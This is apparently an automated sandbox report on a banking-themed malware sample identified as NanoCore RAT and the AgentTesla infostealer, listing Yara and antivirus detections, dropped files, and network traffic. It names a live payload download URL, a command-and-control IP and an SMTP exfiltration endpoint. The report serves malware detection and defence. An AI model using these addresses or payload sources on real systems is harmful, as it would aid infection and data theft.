Source: http://bmn.lpmpbanten.id/fint/Waxhxbwa_Ytgbplyy.jpg9Mytlggh.Properties.ResourcesSCsupumbveaihwmgvdfi	Avira URL Cloud: Label: malware
Source: http://bmn.lpmpbanten.id	Avira URL Cloud: Label: malware
Source: http://bmn.lpmpbanten.id/fint/Waxhxbwa_Ytgbplyy.jpg	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe

Avira: detection malicious, Label: TR/Spy.Gen8

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Metadefender: Detection: 37%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	ReversingLabs: Detection: 84%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\windscribe\windscribe.exe	ReversingLabs: Detection: 31%

Yara detected Nanocore RAT

Source: Yara match	File source: 12.2.OCBC_BAN.EXE.5ba0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.OCBC_BAN.EXE.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.OCBC_BAN.EXE.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.OCBC_BAN.EXE.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OCBC_BAN.EXE.3d32ef0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.OCBC_BAN.EXE.3a1ff24.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.OCBC_BAN.EXE.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.OCBC_BAN.EXE.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.OCBC_BAN.EXE.3a1b0ee.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.OCBC_BAN.EXE.3a2454d.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.OCBC_BAN.EXE.5ba4629.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.OCBC_BAN.EXE.5ba0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.OCBC_BAN.EXE.400000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.OCBC_BAN.EXE.3a1ff24.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OCBC_BAN.EXE.3d32ef0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000000.529083505.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.528619863.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.536986787.0000000003C93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.632460543.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.536754919.0000000003B99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.530203909.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.529485631.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.637443502.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.634125334.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.635571105.00000000039D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.537196889.0000000003D32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: OCBC_BAN.EXE PID: 4500, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: OCBC_BAN.EXE PID: 3524, type: MEMORYSTR

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe

Joe Sandbox ML: detected

Source: 12.0.OCBC_BAN.EXE.400000.4.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 12.2.OCBC_BAN.EXE.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 12.0.OCBC_BAN.EXE.400000.10.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 12.0.OCBC_BAN.EXE.400000.8.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 12.0.OCBC_BAN.EXE.400000.6.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 12.2.OCBC_BAN.EXE.5ba0000.9.unpack	Avira: Label: TR/NanoCore.fadte
Source: 12.0.OCBC_BAN.EXE.400000.12.unpack	Avira: Label: TR/Dropper.MSIL.Gen7

Source: OCBC_BAN.EXE

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: OCBC_BAN.EXE

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2848901 ETPRO TROJAN Observed Reversed EXE String Inbound (This Program...) 103.8.79.204:80 -> 192.168.2.6:49737
Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49786 -> 200.40.119.50:587

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 23.105.131.196
Source: Malware configuration extractor	URLs: 127.0.0.1

Source: Joe Sandbox View

ASN Name: AdministracionNacionaldeTelecomunicacionesUY AdministracionNacionaldeTelecomunicacionesUY

Source: global traffic

HTTP traffic detected: GET /fint/Waxhxbwa_Ytgbplyy.jpg HTTP/1.1Host: bmn.lpmpbanten.idConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 103.8.79.204 103.8.79.204

Source: global traffic	TCP traffic: 192.168.2.6:49786 -> 200.40.119.50:587
Source: global traffic	TCP traffic: 192.168.2.6:49795 -> 23.105.131.196:9070

Source: global traffic

TCP traffic: 192.168.2.6:49786 -> 200.40.119.50:587

Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.196
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.196

Source: Pubrtkzyqpdcef1.exe, 00000009.00000002.634035995.0000000003161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: Pubrtkzyqpdcef1.exe, 00000009.00000002.634035995.0000000003161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: Pubrtkzyqpdcef1.exe, 00000009.00000002.634035995.0000000003161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://WmuGtz.com
Source: OCBC_BAN.EXE, 00000000.00000002.535616448.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bmn.lpmpbanten.id
Source: OCBC_BAN.EXE	String found in binary or memory: http://bmn.lpmpbanten.id/fint/Waxhxbwa_Ytgbplyy.jpg
Source: OCBC_BAN.EXE, windscribe.exe.0.dr	String found in binary or memory: http://bmn.lpmpbanten.id/fint/Waxhxbwa_Ytgbplyy.jpg9Mytlggh.Properties.ResourcesSCsupumbveaihwmgvdfi
Source: Pubrtkzyqpdcef1.exe, 00000009.00000002.634961619.000000000349E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.elparque.com.uy
Source: Pubrtkzyqpdcef1.exe, 00000009.00000002.634961619.000000000349E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mx.mf.netgate.com.uy
Source: OCBC_BAN.EXE, 00000000.00000002.535616448.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Pubrtkzyqpdcef1.exe, 00000009.00000002.634035995.0000000003161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org%
Source: Pubrtkzyqpdcef1.exe, 00000009.00000002.634035995.0000000003161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org%%startupfolder%
Source: OCBC_BAN.EXE, 00000000.00000002.535692685.0000000002BCC000.00000004.00000800.00020000.00000000.sdmp, OCBC_BAN.EXE, 00000000.00000002.536198846.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: OCBC_BAN.EXE, 00000000.00000002.535692685.0000000002BCC000.00000004.00000800.00020000.00000000.sdmp, OCBC_BAN.EXE, 00000000.00000002.536198846.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: OCBC_BAN.EXE, 00000000.00000002.535692685.0000000002BCC000.00000004.00000800.00020000.00000000.sdmp, OCBC_BAN.EXE, 00000000.00000002.536198846.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot
Source: Pubrtkzyqpdcef1.exe, 00000009.00000002.634035995.0000000003161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www

Source: unknown

DNS traffic detected: queries for: bmn.lpmpbanten.id

Source: global traffic

HTTP traffic detected: GET /fint/Waxhxbwa_Ytgbplyy.jpg HTTP/1.1Host: bmn.lpmpbanten.idConnection: Keep-Alive

Source: OCBC_BAN.EXE, 00000000.00000002.533747340.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: OCBC_BAN.EXE, 0000000C.00000002.634125334.00000000029D1000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: RegisterRawInputDevices

E-Banking Fraud

Yara detected Nanocore RAT

Source: Yara match	File source: 12.2.OCBC_BAN.EXE.5ba0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.OCBC_BAN.EXE.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.OCBC_BAN.EXE.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.OCBC_BAN.EXE.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OCBC_BAN.EXE.3d32ef0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.OCBC_BAN.EXE.3a1ff24.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.OCBC_BAN.EXE.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.OCBC_BAN.EXE.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.OCBC_BAN.EXE.3a1b0ee.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.OCBC_BAN.EXE.3a2454d.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.OCBC_BAN.EXE.5ba4629.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.OCBC_BAN.EXE.5ba0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.OCBC_BAN.EXE.400000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.OCBC_BAN.EXE.3a1ff24.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OCBC_BAN.EXE.3d32ef0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000000.529083505.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.528619863.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.536986787.0000000003C93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.632460543.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.536754919.0000000003B99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.530203909.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.529485631.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.637443502.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.634125334.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.635571105.00000000039D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.537196889.0000000003D32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: OCBC_BAN.EXE PID: 4500, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: OCBC_BAN.EXE PID: 3524, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 12.2.OCBC_BAN.EXE.5ba0000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.OCBC_BAN.EXE.5ba0000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0.2.OCBC_BAN.EXE.2cd8784.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.OCBC_BAN.EXE.2cd8784.1.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0.2.OCBC_BAN.EXE.2cd8784.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.0.OCBC_BAN.EXE.400000.10.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.0.OCBC_BAN.EXE.400000.10.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 12.0.OCBC_BAN.EXE.400000.10.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.0.Pubrtkzyqpdcef1.exe.e30000.3.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 12.2.OCBC_BAN.EXE.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.OCBC_BAN.EXE.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 12.2.OCBC_BAN.EXE.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.3.OCBC_BAN.EXE.a7b3e38.0.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 12.0.OCBC_BAN.EXE.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.0.OCBC_BAN.EXE.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 12.0.OCBC_BAN.EXE.400000.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.0.Pubrtkzyqpdcef1.exe.e30000.0.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.2.OCBC_BAN.EXE.5300000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.OCBC_BAN.EXE.5300000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0.3.OCBC_BAN.EXE.a803e58.1.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.OCBC_BAN.EXE.3d32ef0.5.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.OCBC_BAN.EXE.3d32ef0.5.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0.2.OCBC_BAN.EXE.3d32ef0.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.2.OCBC_BAN.EXE.3a1ff24.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.OCBC_BAN.EXE.3a1ff24.4.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 9.2.Pubrtkzyqpdcef1.exe.e30000.0.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 12.0.OCBC_BAN.EXE.400000.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.0.OCBC_BAN.EXE.400000.6.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 12.0.OCBC_BAN.EXE.400000.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.0.OCBC_BAN.EXE.400000.8.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.0.OCBC_BAN.EXE.400000.8.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 12.0.OCBC_BAN.EXE.400000.8.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.0.Pubrtkzyqpdcef1.exe.e30000.1.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.3.OCBC_BAN.EXE.a7b3e38.0.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.3.OCBC_BAN.EXE.a803e58.1.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 12.2.OCBC_BAN.EXE.3a1b0ee.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.OCBC_BAN.EXE.3a1b0ee.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 12.2.OCBC_BAN.EXE.3a1b0ee.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.2.OCBC_BAN.EXE.3a2454d.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.OCBC_BAN.EXE.3a2454d.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.2.OCBC_BAN.EXE.5ba4629.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.OCBC_BAN.EXE.5ba4629.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0.2.OCBC_BAN.EXE.2cd8784.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.OCBC_BAN.EXE.2cd8784.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0.2.OCBC_BAN.EXE.2cd8784.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.2.OCBC_BAN.EXE.5ba0000.9.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.OCBC_BAN.EXE.5ba0000.9.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 12.0.OCBC_BAN.EXE.400000.12.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.0.OCBC_BAN.EXE.400000.12.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 12.0.OCBC_BAN.EXE.400000.12.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.0.Pubrtkzyqpdcef1.exe.e30000.2.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.2.OCBC_BAN.EXE.3a1ff24.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.OCBC_BAN.EXE.3a1ff24.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 12.2.OCBC_BAN.EXE.2a39560.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.OCBC_BAN.EXE.2a39560.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0.3.OCBC_BAN.EXE.985c050.2.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.3.OCBC_BAN.EXE.985c050.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.OCBC_BAN.EXE.3d32ef0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.OCBC_BAN.EXE.3d32ef0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0.2.OCBC_BAN.EXE.3d32ef0.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000002.637242495.0000000005300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000002.637242495.0000000005300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000C.00000000.529083505.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000000.529083505.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000000.528619863.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000000.528619863.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.536986787.0000000003C93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.536986787.0000000003C93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000002.632460543.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000002.632460543.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.536754919.0000000003B99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.536754919.0000000003B99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000000.530203909.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000000.530203909.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000000.529485631.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000000.529485631.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.536084808.0000000002C9D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.536084808.0000000002C9D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000002.637443502.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000002.637443502.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000C.00000002.634125334.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000002.635571105.00000000039D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.537196889.0000000003D32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.537196889.0000000003D32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: OCBC_BAN.EXE PID: 4500, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
